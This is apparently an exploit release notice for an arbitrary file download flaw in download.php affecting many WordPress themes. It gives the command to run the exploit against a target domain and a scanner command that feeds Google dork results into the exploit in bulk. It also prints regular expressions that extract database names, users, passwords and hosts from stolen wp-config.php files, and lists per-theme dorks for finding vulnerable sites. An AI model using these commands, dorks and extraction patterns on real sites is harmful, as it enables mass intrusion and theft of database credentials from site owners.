Multiple WordPress themes suffer from an arbitrary file download vulnerability in download.php. These include Ultimatum, Medicate, Centum, Avada, Striking Theme & E-Commerce, cuckootap, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Trinity, Lote27, and Revslider themes.
------------------------------------------------------------------------------
# *NAME*:
Wordpress A.F.D Verification/ INURL - BRASIL
# *TIPE*: Arbitrary File Download
# *Tested on*: Linux
# *EXECUTE*:
php exploit.php www.target.gov.us
# *OUTPUT*: WORDPRES_A_F_D.txt
# *AUTOR*:
GoogleINURL
# *EMAIL*:
[email protected]
# *Blog*:
http://blog.inurl.com.br
# *Twitter*:
https://twitter.com/googleinurl
# *Fanpage*:
https://fb.com/InurlBrasil
# *GIT: *
https://github.com/googleinurl
# *YOUTUBE *
https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# *PACKETSTORMSECURITY:*
http://packetstormsecurity.com/user/googleinurl/
#
------------------------------------------------------------------------------
#
Comand Exec Scanner INURLBR:
#
#
./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
#
#
Download Scanner INURLBR:
#
https://github.com/googleinurl/SCANNER-INURLBR
#
------------------------------------------------------------------------------
Description:
This exploit allows the attacker to exploit the flaw Arbitrary File
Download in dozens of wordpress themes.
Through regular expressions, the script will perform the check for each
target url checking your wp-config.php file
Regular expressions:
preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']);
preg_match_all("(DB_USER.*')", $body, $status['DB_USER']);
preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']);
preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']);
preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']);
*D O R K'S:
WordPress Ultimatum Theme Arbitrary File Download
Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
WordPress Centum Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
Google Dork:: "Index of" & /wp-content/themes/Centum/
WordPress Avada Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
Google Dork:: "Index of" & /wp-content/themes/Avada/
WordPress Striking Theme & E-Commerce Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
Google Dork:: "Index of" & /wp-content/themes/striking_r/
WordPress Beach Apollo Arbitrary File Download
Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
Dork Google: inurl:ajax-store-locator
index of ajax-store-locator
Vendor Homepage::
http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
WordPress cuckootap Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/cuckootap/
Vendor Homepage:: http://www.cuckoothemes.com/
WordPress IncredibleWP Theme Arbitrary File Download
Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/
WordPress Ultimatum Theme Arbitrary File Download
Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
Google Dork:: "Index of" & /wp-content/themes/ultimatum
WordPress Medicate Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
Google Dork:: "Index of" & /wp-content/themes/medicate/
WordPress Centum Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
Google Dork:: "Index of" & /wp-content/themes/Centum/
WordPress Avada Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
Google Dork:: "Index of" & /wp-content/themes/Avada/
WordPress Striking Theme & E-Commerce Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
Google Dork:: "Index of" & /wp-content/themes/striking_r/
WordPress Beach Apollo Arbitrary File Download
Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
WordPress Trinity Theme Arbitrary File Download
Vendor Homepage:: https://churchthemes.net/themes/trinity/
Google Dork:: "Index of" & /wp-content/themes/trinity/
WordPress Lote27 Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/lote27/
WordPress Revslider Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
Google Dork:: wp-admin & inurl:revslider_show_image
Exploit::
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
![[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_uscLOA2hrVVt0ZuLIC-YGYJhOaWIUtPuOE4Qh7TTZZDNKO-yvZoGD4a6Hc4rWNmrakEMjbQUPFupTtjCCHkXrvRHuSbr7KWRsFIwD_IdXcgp_26BknR_5QVLC_hvka7avp7sHpLKq7yv/s1600/Sem+t%C3%ADtulo.png "[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL")
